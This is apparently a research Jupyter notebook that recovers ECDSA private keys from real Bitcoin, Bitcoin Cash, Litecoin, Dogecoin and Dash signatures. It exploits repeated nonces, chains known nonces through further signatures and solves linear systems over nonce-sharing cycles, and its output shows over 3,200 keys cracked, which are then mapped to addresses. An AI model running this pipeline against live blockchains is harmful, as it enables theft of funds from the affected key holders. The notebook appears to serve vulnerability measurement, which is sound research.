In [224]:
from utxo_utils.crypto.signature import verifySignature
import glob
import os
import pandas as pd
import ecdsa
import itertools
from copy import deepcopy
from sympy import Matrix
import math

In [225]:
#################
# DATA HANDLING #
#################
def is_row_valid(row):
    try:
        verifySignature(row["pubkey"], f"{int(row["r"], 16):064x}" + f"{int(row["s"], 16):064x}", row["message digest"])
        return True
    except Exception:
        return False


def collect_file_paths(folders: list[str]):
    signatures_files = []
    for folder in folders:
        signatures_files += glob.glob(os.path.join(folder, "*.parquet"))
    return signatures_files


def read_raw_data(signatures_folders: list[str], check_signatures: bool = False):
    signatures_files = collect_file_paths(signatures_folders)
    df = pd.concat(
        pd.read_parquet(parquet_file)
        for parquet_file in signatures_files
    )

    # Last filtering step: remove possible unvalid signatures
    filtered_df = df if not check_signatures else df[df.apply(is_row_valid, axis=1)]

    return filtered_df


def prepare_data(df):
    """ Read the signature files and group the rows by pubkey and r such that it contains two message digests and two s."""
    # Group by pubkey and r. Keep two records for every row.
    grouped_df = (
        df.sort_values(by=["block_timestamp"])
        .groupby(by=["pubkey", "r", "s", "message digest"], sort=False)
        .head(1)
        .groupby(by=["pubkey", "r"], sort=False)
        .aggregate(
            s_cnt=("s", "nunique"),
            digest_cnt=("message digest", "nunique"),
            s=("s", lambda s: s.drop_duplicates().head(2)),
            digests=("message digest", lambda s: s.drop_duplicates().head(2)),
            chain=("chain", lambda s: s.drop_duplicates()),
            block_timestamps=("block_timestamp", lambda s: s.head(2)),
        )
    )
    # Keep the records in presence of a repeated nonce
    grouped_df = grouped_df[(grouped_df["s_cnt"] > 1) & (grouped_df["digest_cnt"] > 1)].drop(columns=["s_cnt", "digest_cnt"])

    return grouped_df

In [226]:
##################
# SIG MANAGEMENT #
##################
def derive_private_key(row, curve=ecdsa.SECP256k1):
    # Data
    r = int(row.name[1], base=16)
    s1, s2 = map(lambda s: int(s, base=16), row.s)
    h1_str, h2_str = row.digests
    h1, h2 = (
        int(h1_str, base=16),
        int(h2_str, base=16),
    )

    # Typecasting & constants
    order = curve.order
    generator = curve.generator

    for s1, s2 in [
        [s1, s2],
        [order - s1, s2],
        [s1, order - s2],
        [order - s1, order - s2],
    ]:
        # Nonce derivation
        s_diff_inv = pow((s1 - s2), -1, order)
        nonce = ((h1 - h2) * s_diff_inv) % order
        if r == (nonce * generator).x():
            priv_key = pow(r, -1, order) * (s2 * nonce - h2) % order
            sk = ecdsa.SigningKey.from_secret_exponent(
                secexp=priv_key, curve=curve, hashfunc=None
            )
            vk = sk.get_verifying_key()
            try:
                # Check the validity of the private key, as we might have recovered -k if the user has published -s1 and -s2 (which are still valid) over the network.
                vk.verify_digest(
                    bytes.fromhex(f"{r:064x}{s1:064x}"),
                    bytes.fromhex(h1_str),
                )
                vk.verify_digest(
                    bytes.fromhex(f"{r:064x}{s2:064x}"),
                    bytes.fromhex(h2_str),
                )
                return {"nonce": nonce, "private_key": priv_key}
            except Exception as e:
                raise e

    raise ValueError(
        "The nonce and the private key could not be recovered: the input signatures are probably invalid."
    )


def derive_private_key_from_known_nonce(row, curve=ecdsa.SECP256k1):
    order = curve.order

    # Data
    pubkey = row["pubkey"]
    r = int(row["r"], base=16)
    s = int(row["s"], 16)
    h_str = row["message digest"]
    h = int(h_str, 16)
    nonce = row["nonce"]

    expected_vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(pubkey), curve=curve)
    # We have to be careful that for a given nonce and given signature, 2 private keys are valid, see ecdsa_tutorial (mirror_key)
    priv_key = pow(r, -1, order) * (s * nonce - h) % order
    sk = ecdsa.SigningKey.from_secret_exponent(
        secexp=priv_key, curve=curve, hashfunc=None
    )
    vk = sk.get_verifying_key()
    vk.verify_digest(
        bytes.fromhex(f"{r:064x}{s:064x}"),
        bytes.fromhex(h_str),
    )

    if vk != expected_vk:
        nonce = (order - nonce) % order
        # Let's fetch the alternative private key, that could have signed that message
        priv_key = (pow(r, -1, order) * s * (2 * nonce) + priv_key) % order
        sk = ecdsa.SigningKey.from_secret_exponent(
            secexp=priv_key, curve=curve, hashfunc=None
        )
        vk = sk.get_verifying_key()
        vk.verify_digest(
            bytes.fromhex(f"{r:064x}{s:064x}"),
            bytes.fromhex(h_str),
        )

        assert vk == expected_vk

    return priv_key


def derive_nonce_from_known_private_key(
    h: int, r: int, d: int, s: int, curve=ecdsa.SECP256k1
):

    nonce = (pow(s, -1, curve.order) * (h + r * d)) % curve.order

    assert (nonce * curve.generator).x() == r

    return nonce

In [227]:
#################
# POST CHECKING #
#################
def verify_private_keys(pubkey, privkey, curve=ecdsa.SECP256k1):
    # Verify that every recovered private key is valid
    vk_expected = ecdsa.VerifyingKey.from_string(bytes.fromhex(pubkey), curve=curve)
    sk = ecdsa.SigningKey.from_secret_exponent(secexp=privkey, curve=curve)
    vk = sk.get_verifying_key()

    assert vk == vk_expected


def verify_nonce(r: str, nonce: int, curve=ecdsa.SECP256k1):
    r = int(r, 16)
    assert (curve.generator * nonce).x() == r

In [228]:
#############
# ADDRESSES #
#############

from utxo_utils.encoding.address import (
    hash_to_32address,
    hash_to_58address,
)
from utxo_utils.crypto.hash import hash160
from bitcoincash.cashaddr import PUBKEY_TYPE, encode


def generate_utxo_addresses(pubkey):

    vk = ecdsa.VerifyingKey.from_string(
        bytes.fromhex(pubkey),
        curve=ecdsa.SECP256k1,
    )
    chains = ["btc", "bch", "doge", "dash", "ltc"]
    pubkey_formats = ["uncompressed", "compressed", "hybrid"]
    addresses = {
        chain: {pubkey_format: []}
        for pubkey_format in pubkey_formats
        for chain in chains
    }

    for pubkey_format in pubkey_formats:
        pubkey = vk.to_string(encoding=pubkey_format).hex()
        h = hash160(pubkey)
        script_hash = hash160("0014" + h)
        addresses["btc"][pubkey_format] = [
            hash_to_32address(h),
            hash_to_58address(h, address_version="00"),
            hash_to_58address(  # Nested p2wpkh insided p2sh
                script_hash,
                "05",
            ),
        ]
        addresses["bch"][pubkey_format] = [
            encode(
                "bitcoincash",
                PUBKEY_TYPE,
                bytes.fromhex(h),
            ),
            hash_to_58address(h, address_version="00"),
        ]
        addresses["doge"][pubkey_format] = [hash_to_58address(h, address_version="1e")]
        addresses["dash"][pubkey_format] = [hash_to_58address(h, address_version="4c")]
        # TODO add segwit
        addresses["ltc"][pubkey_format] = [
            hash_to_58address(h, address_version="30"),
            hash_to_32address(h, hrp="ltc"),
            hash_to_58address(  # Nested p2wpkh insided p2sh
                script_hash,
                "05",
            ),
            hash_to_58address(  # Nested p2wpkh insided p2sh / new prefix for p2sh
                script_hash,
                "32",
            ),
        ]

    return addresses


def generate_flatten_utxo_addresses(pubkey):
    addresses_dict = generate_utxo_addresses(pubkey)

    chains, formats, addresses = [], [], []
    for chain in addresses_dict:
        for format in addresses_dict[chain]:
            for address in addresses_dict[chain][format]:
                chains.append(chain)
                formats.append(format)
                addresses.append(address)
    return {"chain_address": chains, "pubkey_format": formats, "address": addresses}

In [229]:
bch_signatures_folders = [
    "/Users/vincent/Documents/PhD/Blockchains/UTXO/ecdsa-signatures/data/signatures/bch",
]

signatures_folders = [
    "/Users/vincent/Documents/PhD/Blockchains/UTXO/ecdsa-signatures/data/signatures/btc",
    "/Users/vincent/Documents/PhD/Blockchains/UTXO/ecdsa-signatures/data/signatures/dash",
    "/Users/vincent/Documents/PhD/Blockchains/UTXO/ecdsa-signatures/data/signatures/bch",
    "/Users/vincent/Documents/PhD/Blockchains/UTXO/ecdsa-signatures/data/signatures/ltc",
    "/Users/vincent/Documents/PhD/Blockchains/UTXO/ecdsa-signatures/data/signatures/doge",
]


def drop_cracked_keys(sig_df, cracked_keys_df):
    return (
        pd.merge(
            sig_df,
            cracked_keys_df[["pubkey"]],
            indicator=True,
            how="outer",
            on="pubkey",
        )
        .query('_merge=="left_only"')
        .drop("_merge", axis=1)
    )


# Read the data
bch_sig_df = read_raw_data(bch_signatures_folders, check_signatures=True)
other_sig_df = read_raw_data(signatures_folders, check_signatures=False)
sig_df = pd.concat([bch_sig_df, other_sig_df])

# ROUND 0: Retrieve the private keys from the use of repeated nonces
repeated_nonces_df = prepare_data(sig_df)
repeated_nonces_df[["nonce", "private_key"]] = repeated_nonces_df.apply(
    lambda row: derive_private_key(row, ecdsa.SECP256k1), axis=1, result_type="expand"
)
# Check the validity of the results
repeated_nonces_df.apply(
    lambda row: verify_private_keys(row.name[0], row.private_key), axis=1
)
repeated_nonces_df.apply(lambda row: verify_nonce(row.name[1], row.nonce), axis=1)

# List all 'r' values which are known
known_nonces_df = (
    repeated_nonces_df.reset_index()[["r", "block_timestamps", "nonce", "chain"]]
    .sort_values(  # We want the earliest time at which the 'r' value became vulnerable
        by=["block_timestamps"], key=lambda time_frame: time_frame.map(lambda x: x[1])
    )
    .groupby(by="r", sort=False)
    .head(1)
)
known_nonces_df["vulnerable_timestamp"] = known_nonces_df["block_timestamps"].apply(
    lambda tf: tf[1]
)
known_nonces_df = known_nonces_df.rename(columns={"chain": "r_chain_origin"})
known_nonces_df = known_nonces_df.drop(columns=["block_timestamps"])
known_nonces_df = known_nonces_df.set_index(keys="r")

# Format the results obtained so far
prev_cnt = 0
cracked_keys_df = pd.merge(
    repeated_nonces_df.drop(
        columns=["block_timestamps", "digests", "s", "nonce"]
    ).reset_index(),
    known_nonces_df[["r_chain_origin", "vulnerable_timestamp"]],
    on="r",
).drop_duplicates()

# Update the set of keys that remains to crack
uncracked_keys_df = drop_cracked_keys(sig_df, cracked_keys_df).drop(
    columns=["transaction_hash", "input_index"]
)

In [230]:
while cracked_keys_df["private_key"].nunique() != prev_cnt:
    prev_cnt = cracked_keys_df["private_key"].nunique()
    crackable_keys = pd.merge(uncracked_keys_df, known_nonces_df, on="r")
    if len(crackable_keys) == 0:
        break
    crackable_keys["private_key"] = crackable_keys.apply(
        derive_private_key_from_known_nonce, axis=1
    )
    crackable_keys = crackable_keys.drop(
        columns=["s", "message digest", "nonce", "block_timestamp"]
    )
    crackable_keys.apply(
        lambda row: verify_private_keys(row.pubkey, row.private_key), axis=1
    )

    # Expand our set of known nonces
    recoverable_nonces = pd.merge(
        uncracked_keys_df,
        crackable_keys[
            ["pubkey", "private_key", "vulnerable_timestamp", "r_chain_origin"]
        ],
        how="inner",
        on="pubkey",
    )
    recoverable_nonces["nonce"] = recoverable_nonces.apply(
        lambda row: derive_nonce_from_known_private_key(
            int(row["message digest"], 16),
            int(row["r"], 16),
            row["private_key"],
            int(row["s"], 16),
        ),
        axis=1,
    )

    recoverable_nonces = recoverable_nonces[
        ["r", "nonce", "r_chain_origin", "vulnerable_timestamp"]
    ].set_index("r")
    known_nonces_df = (
        pd.concat([recoverable_nonces, known_nonces_df])
        .sort_values(by="vulnerable_timestamp")
        .groupby(by="r", sort=False)
        .head(1)
    )

    # Expand our set of cracked keys
    cracked_keys_df = pd.concat([crackable_keys, cracked_keys_df]).drop_duplicates()

    # Update the set of keys that remains to crack
    uncracked_keys_df = drop_cracked_keys(sig_df, cracked_keys_df).drop(
        columns=["transaction_hash", "input_index"]
    )

    # Print some stats
    print(uncracked_keys_df["pubkey"].nunique())
    print(cracked_keys_df["pubkey"].nunique())
    print(sig_df["pubkey"].nunique())
    print(len(known_nonces_df.index))

19115
2645
21760
605
18958
2802
21760
948
18704
3056
21760
1425
18607
3153
21760
1478
18588
3172
21760
1488
18581
3179
21760
1492
18578
3182
21760
1493


In [231]:
import networkx as nx

uncracked_keys_df["pubkey_chain"] = (
    uncracked_keys_df["chain"] + ":" + uncracked_keys_df["pubkey"]
)

uncracked_keys_df

G = nx.Graph()
G.add_edges_from(uncracked_keys_df[["pubkey_chain", "r"]].to_numpy().tolist())
connected_components = list(nx.connected_components(G))
connected_components = sorted(
    connected_components,
    key=lambda comp: len(list(filter(lambda s: ":" in s, comp))),
    reverse=True,
)
cycles = nx.cycle_basis(G)
print(len(cycles))

71


In [240]:
def solve(m, b, pos, pubkeys, r, curve=ecdsa.SECP256k1):
    m = deepcopy(m)

    for x in pos:
        for j in range(len(b) // 2):
            m[x][j] = -m[x][j] % ecdsa.SECP256k1.order if m[x][j] != 0 else 0

    m = Matrix(m)
    b = Matrix(b)
    sol = m.inv_mod(ecdsa.SECP256k1.order) * b % ecdsa.SECP256k1.order

    private_keys = {}
    for i, s in enumerate(sol[len(b) // 2 :]):
        sk = ecdsa.SigningKey.from_secret_exponent(
            secexp=s,
            curve=ecdsa.SECP256k1,
        )
        vk = sk.get_verifying_key()
        pubkey = vk.to_string("compressed").hex()
        private_keys[pubkey] = s

    if set(private_keys.keys()) == set(pubkeys):
        nonces = {}
        for nonce in sol[: len(b) // 2]:
            r_int = (curve.generator * nonce).x()
            r_int_to_str = {int(r_str, 16): r_str for r_str in r}
            nonces[r_int_to_str[r_int]] = nonce

        return nonces, private_keys
    return None, None


def solve_for_all_alterations(m, b, pubkeys, r):
    pos_s = [i for i in range(len(b))]
    for L in range(len(pos_s) + 1):
        for subset in itertools.combinations(pos_s, L):
            nonces, priv_keys = solve(m, b, subset, pubkeys, r)
            if nonces and priv_keys:
                assert set(nonces.keys()) == set(r)
                return nonces, priv_keys

    raise ValueError("The private keys could not be recovered.")


def get_rows_from_cycle(df, cycle):
    to_fetch = []

    for node, next_node in zip(cycle, cycle[1:] + [cycle[0]]):
        if ":" in node:
            pk = node.split(":")[1]
            r = next_node
        else:
            pk = next_node.split(":")[1]
            r = node
        to_fetch.append((pk, r))

    rows = df.loc[to_fetch].sort_index()
    return rows


def build_system_matrix(rows, curve=ecdsa.SECP256k1):
    if len(rows) % 2:
        raise ValueError("The number of signatures should be even.")

    pk_to_pos = {pk: i for i, pk in enumerate(set(map(lambda i: i[0], rows.index)))}
    r_to_pos = {
        r: i for i, r in enumerate(set(map(lambda i: int(i[1], 16), rows.index)))
    }

    m = [[0 for _ in range(len(cycle))] for _ in range(len(cycle))]
    b = []
    dim = len(rows)

    for i, tuple in enumerate(rows.itertuples()):
        pk, r, s, h = (
            tuple.Index[0],
            int(tuple.Index[1], 16),
            int(tuple.s, 16),
            int(tuple.h, 16),
        )
        m[i][r_to_pos[r]] = s
        m[i][pk_to_pos[pk] + dim // 2] = -r % ecdsa.SECP256k1.order
        b.append(h)

    return m, b


indexed_df = uncracked_keys_df.set_index(keys=["pubkey", "r"]).rename(
    columns={"message digest": "h"}
)
for cycle in cycles[:]:
    rows = get_rows_from_cycle(indexed_df, cycle)
    r_chain_origin = (
        rows.iloc[0].chain if rows["chain"].nunique() == 1 else rows["chain"].unique()
    )
    vulnerable_timestamp = rows["block_timestamp"].max()
    m, b = build_system_matrix(rows)

    seen = set()
    pubkeys = [
        tuple.Index[0]
        for tuple in rows.itertuples()
        if not (tuple.Index[0] in seen or seen.add(tuple.Index[0]))
    ]
    seen = set()
    r = [
        tuple.Index[1]
        for tuple in rows.itertuples()
        if not (tuple.Index[1] in seen or seen.add(tuple.Index[1]))
    ]

    nonces, private_keys = solve_for_all_alterations(m, b, pubkeys, r)

    # Expand our set of nonces
    nonces_rows = []
    for r, nonce in nonces.items():
        nonces_rows.append((r, nonce, r_chain_origin, vulnerable_timestamp))
    known_nonces_df = pd.concat(
        [
            pd.DataFrame(
                nonces_rows, columns=known_nonces_df.reset_index().columns
            ).set_index(keys="r"),
            known_nonces_df,
        ]
    )

    # Expand our set of cracked keys
    rows = (
        rows.drop(columns=["s", "h", "pubkey_chain"])
        .rename(columns={"block_timestamp": "vulnerable_timestamp"})
        .reset_index()
    )
    rows["r_chain_origin"] = r_chain_origin
    rows["private_key"] = rows["pubkey"].apply(lambda pubkey: private_keys[pubkey])
    cracked_keys_df = pd.concat([rows, cracked_keys_df]).drop_duplicates()

    # Update the set of keys that remains to crack
    uncracked_keys_df = drop_cracked_keys(sig_df, cracked_keys_df).drop(
        columns=["transaction_hash", "input_index"]
    )

    # Print some stats
    print(uncracked_keys_df["pubkey"].nunique())
    print(cracked_keys_df["pubkey"].nunique())
    print(sig_df["pubkey"].nunique())
    print(len(known_nonces_df.index))

18575
3185
21760
1496
18573
3187
21760
1498
18572
3188
21760
1500
18570
3190
21760
1502
18569
3191
21760
1504
18568
3192
21760
1506
18567
3193
21760
1508
18566
3194
21760
1510
18565
3195
21760
1512
18564
3196
21760
1514
18563
3197
21760
1516
18562
3198
21760
1518
18561
3199
21760
1520
18560
3200
21760
1522
18559
3201
21760
1524
18558
3202
21760
1526
18557
3203
21760
1528
18556
3204
21760
1530
18554
3206
21760
1532
18553
3207
21760
1534
18551
3209
21760
1536
18549
3211
21760
1538
18549
3211
21760
1540
18548
3212
21760
1542
18548
3212
21760
1544
18547
3213
21760
1546
18547
3213
21760
1548
18546
3214
21760
1550
18546
3214
21760
1552
18545
3215
21760
1554
18545
3215
21760
1556
18544
3216
21760
1558
18544
3216
21760
1560
18542
3218
21760
1562
18542
3218
21760
1564
18542
3218
21760
1566
18536
3224
21760
1572
18534
3226
21760
1574
18532
3228
21760
1576
18530
3230
21760
1578
18528
3232
21760
1580
18528
3232
21760
1582
18528
3232
21760
1584
18526
3234
21760
1586
18526
3234
21760
1588
18525
3235

In [241]:
while cracked_keys_df["private_key"].nunique() != prev_cnt:
    prev_cnt = cracked_keys_df["private_key"].nunique()
    crackable_keys = pd.merge(uncracked_keys_df, known_nonces_df, on="r")
    if len(crackable_keys) == 0:
        break
    crackable_keys["private_key"] = crackable_keys.apply(
        derive_private_key_from_known_nonce, axis=1
    )
    crackable_keys = crackable_keys.drop(
        columns=["s", "message digest", "nonce", "block_timestamp"]
    )
    crackable_keys.apply(
        lambda row: verify_private_keys(row.pubkey, row.private_key), axis=1
    )

    # Expand our set of known nonces
    recoverable_nonces = pd.merge(
        uncracked_keys_df,
        crackable_keys[
            ["pubkey", "private_key", "vulnerable_timestamp", "r_chain_origin"]
        ],
        how="inner",
        on="pubkey",
    )
    recoverable_nonces["nonce"] = recoverable_nonces.apply(
        lambda row: derive_nonce_from_known_private_key(
            int(row["message digest"], 16),
            int(row["r"], 16),
            row["private_key"],
            int(row["s"], 16),
        ),
        axis=1,
    )

    recoverable_nonces = recoverable_nonces[
        ["r", "nonce", "r_chain_origin", "vulnerable_timestamp"]
    ].set_index("r")
    known_nonces_df = (
        pd.concat([recoverable_nonces, known_nonces_df])
        .sort_values(by="vulnerable_timestamp")
        .groupby(by="r", sort=False)
        .head(1)
    )

    # Expand our set of cracked keys
    cracked_keys_df = pd.concat([crackable_keys, cracked_keys_df]).drop_duplicates()

    # Update the set of keys that remains to crack
    uncracked_keys_df = drop_cracked_keys(sig_df, cracked_keys_df).drop(
        columns=["transaction_hash", "input_index"]
    )

    # Print some stats
    print(uncracked_keys_df["pubkey"].nunique())
    print(cracked_keys_df["pubkey"].nunique())
    print(sig_df["pubkey"].nunique())
    print(len(known_nonces_df.index))

18473
3287
21760
1571
18464
3296
21760
1571


In [245]:
import networkx as nx

uncracked_keys_df["pubkey_chain"] = (
    uncracked_keys_df["chain"] + ":" + uncracked_keys_df["pubkey"]
)

uncracked_keys_df

G = nx.Graph()
G.add_edges_from(uncracked_keys_df[["pubkey_chain", "r"]].to_numpy().tolist())
connected_components = list(nx.connected_components(G))
connected_components = sorted(
    connected_components,
    key=lambda comp: len(list(filter(lambda s: ":" in s, comp))),
    reverse=True,
)
print(list(filter(lambda s: ":" not in s, connected_components[0])))

['00926cd31b298377704537d0a88af069f15d014e6e9b9dd25cb6c0e950bfeedd00', '333ba2b0524803edb7136d5bb583a9e4af9f98cb3c626a25d97cd1bbf0321ccd']


In [246]:
all_private_keys_with_addresses = cracked_keys_df
all_private_keys_with_addresses[["chain_address", "pubkey_format", "address"]] = (
    cracked_keys_df.apply(
        lambda row: generate_flatten_utxo_addresses(row["pubkey"]),
        axis=1,
        result_type="expand",
    )
)
all_private_keys_with_addresses = all_private_keys_with_addresses.explode(
    ["chain_address", "pubkey_format", "address"]
)
all_private_keys_with_addresses[
    ["address", "chain_address", "pubkey", "pubkey_format"]
].to_parquet("addresses.parquet")

In [3]:
import pandas as pd

addresses = pd.read_parquet("../data/addresses.parquet")
len(addresses)